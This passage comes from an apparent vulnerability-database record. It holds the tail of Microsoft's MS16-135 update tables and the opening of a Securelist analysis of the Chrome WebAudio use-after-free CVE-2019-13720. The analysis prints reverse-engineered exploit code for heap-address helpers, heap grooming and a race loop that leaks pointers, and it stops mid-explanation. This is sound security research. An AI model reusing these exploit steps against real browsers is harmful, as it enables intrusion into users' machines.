id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall </span>setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. 
Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span 
class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. 
Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-29\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span 
class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-30\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. 
Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-31\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-32\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197876</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197877</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span 
class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-33\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. 
Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-34\" target=\"_self\">Microsoft Knowledge Base Article 3197876</a><br/>See <a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-35\" target=\"_self\">Microsoft Knowledge Base Article 3197877</a><br/>See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-36\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-37\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows RT 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3197874 Monthly Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-38\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal 
Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-39\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 10 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span 
class=\"text-base\">Windows10.0-KB3200970-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-40\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. 
Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-41\" target=\"_self\">Microsoft Knowledge Base Article 3198585</a><br/>See <a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-42\" target=\"_self\">Microsoft Knowledge Base Article 3198586</a><br/>See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-43\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2016 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2016:<br/><span class=\"text-base\">WindowsServer2016-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-44\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this 
security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-45\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-46\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-47\" target=\"_self\">TechNet 
Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-48\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-49\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-11-11T01:17:01", "id": "KB3199135", "href": "https://support.microsoft.com/en-us/help/3199135/", "published": "2016-11-08T00:00:00", "title": "MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-05-29T22:19:56", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. 
While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). 
A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. 
All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() 
{\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n 
\t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 milliseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. 
